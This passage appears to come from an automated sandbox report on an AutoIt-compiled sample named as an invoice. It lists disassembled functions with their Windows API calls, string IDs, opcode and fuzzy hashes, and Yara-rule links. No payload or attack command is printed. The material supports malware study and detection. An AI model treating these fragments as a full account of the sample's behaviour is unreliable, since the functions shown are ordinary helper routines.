                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 498495726c7c44e8e0f2dd10e96d07745f23b46f0892423e17cf403099eaadfe
                                                              • Instruction ID: 9bf0fff52c452272f962d8d30a62a2afe17d54db06eac8a4707479009fa9c15b
                                                              • Opcode Fuzzy Hash: 498495726c7c44e8e0f2dd10e96d07745f23b46f0892423e17cf403099eaadfe
                                                              • Instruction Fuzzy Hash: D701D6B665011DBBCB01EBE4EA12EFE73AC9F16344F500019B501B3192DBA05E2997B5
                                                              Function 00214D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt
                                                              • String ID: "+
                                                              • API String ID: 3494438863-4013894652
                                                              • Opcode ID: de30142b96fd8cd6d35b542d9a6f12b491d2b6541bb6e81b767c25a62bd46128
                                                              • Instruction ID: 69bc6bdb039007aaafb793e3682a8567417bb69789865e5a353772d252efe2ba
                                                              • Opcode Fuzzy Hash: de30142b96fd8cd6d35b542d9a6f12b491d2b6541bb6e81b767c25a62bd46128
                                                              • Instruction Fuzzy Hash: 60F0C871239712DBEB14AF29FC496E667D4E725720B10022AF608CA284E770C8D18B94
                                                              Function 00237744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              • Opcode ID: 360c100851702dde7e8624a9838e37307ca120d9286e60a06ce5f3bb7cdac14d
                                                              • Instruction ID: 1a18047fb00edc82e676f7026d0f3ac3700a84af90af17a0d101b540a8e904ab
                                                              • Opcode Fuzzy Hash: 360c100851702dde7e8624a9838e37307ca120d9286e60a06ce5f3bb7cdac14d
                                                              • Instruction Fuzzy Hash: 66E0D877A0432537DB20EAA5EC4AFD7FBACEB51B60F00015AF905D3041D670E6518BD4
                                                              Function 0022A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0022A63F
                                                                • Part of subcall function 002113F1: _doexit.LIBCMT ref: 002113FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              • Opcode ID: 48887d4b05fc8cd0796a6b1da1de50c9b08f6277d49a912f276051851ea13658
                                                              • Instruction ID: 5a257d4c11a09969510e303d3110f17516f9c92ef47ef5d6878daa7aff2b990c
                                                              • Opcode Fuzzy Hash: 48887d4b05fc8cd0796a6b1da1de50c9b08f6277d49a912f276051851ea13658
                                                              • Instruction Fuzzy Hash: 73D012312D532933D31436AC7D1BFD9668C9B16F55F140055BB08959C24AE696A042DA
                                                              Function 0026AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0026ACC0
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0026AEBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: DirectoryFreeLibrarySystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 510247158-3257408948
                                                              • Opcode ID: b7489b863f2e0b49331d8076626b8a4008f099e1483bb6a68b08cbba5a5380fc
                                                              • Instruction ID: e120a4939cd893ebe75e9b222c6b54d6664a0602e5bba6ee5a53fcfe543dbf71
                                                              • Opcode Fuzzy Hash: b7489b863f2e0b49331d8076626b8a4008f099e1483bb6a68b08cbba5a5380fc
                                                              • Instruction Fuzzy Hash: 8BE0C9B0C20649DFDB15DFA9E9489ECB7B8AB48301F148186E116B25A1DB705AD4DF22
                                                              Function 00258698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002586A2
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002586B5
                                                                • Part of subcall function 00237A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: d5efafb8e77eb4f15412abf3d0b580f87bd1f63a8f6045cb90ebb1266e0c899e
                                                              • Instruction ID: c730e12370a8b6f1de278b95ed6dbf428d41dfabacb528039835f0bfb9dbbcdc
                                                              • Opcode Fuzzy Hash: d5efafb8e77eb4f15412abf3d0b580f87bd1f63a8f6045cb90ebb1266e0c899e
                                                              • Instruction Fuzzy Hash: 56D01271795318B7E674A770BC4FFC67B689F05B21F500815B74DAA1D0C9E0E990CB54
                                                              Function 002586CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002586E2
                                                              • PostMessageW.USER32(00000000), ref: 002586E9
                                                                • Part of subcall function 00237A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 529732e3af119f94a3a9323c46b9b0e9c3533049b245e9f78f23d71e49bb4592
                                                              • Instruction ID: c8bf6ac6454fe51d811ab63b5a1414af7bb7bda867aa86b677af9ea6b699ca5e
                                                              • Opcode Fuzzy Hash: 529732e3af119f94a3a9323c46b9b0e9c3533049b245e9f78f23d71e49bb4592
                                                              • Instruction Fuzzy Hash: A9D0C9717953186BE664A770AC4FFC66A689B0AB21F500815B649AA1D0C9A0A9908A54